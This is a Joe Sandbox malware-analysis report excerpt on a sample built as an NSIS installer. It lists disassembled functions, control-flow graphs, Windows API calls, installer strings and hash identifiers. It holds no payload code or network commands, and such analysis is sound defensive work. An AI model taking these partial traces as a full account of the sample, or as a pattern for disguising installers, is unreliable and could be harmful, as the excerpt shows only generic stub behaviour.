                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                            Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                            Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                            Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                            Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                            Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
